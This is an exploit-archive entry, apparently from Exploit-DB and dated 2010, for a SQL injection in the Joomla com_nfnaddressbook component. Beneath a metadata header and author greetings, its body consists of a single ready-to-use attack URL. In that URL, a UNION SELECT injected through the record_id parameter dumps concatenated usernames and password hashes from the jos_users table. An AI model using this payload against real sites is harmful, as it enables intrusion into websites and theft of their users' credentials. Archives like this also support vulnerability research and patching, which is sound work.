EXPLOITS

Joomla! Component com_nfnaddressbook - SQL Injection

Author: snakespc
type: webapps
platform: php
port: 
date_added: 2010-03-13  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11730.txt  

==============================================================================
[»] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability
==============================================================================

[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ DrEadFul, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]

###########################################################################
 ===[ Exploit ]===

[»] http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
[»]Author: DrEadFul<-
###########################################################################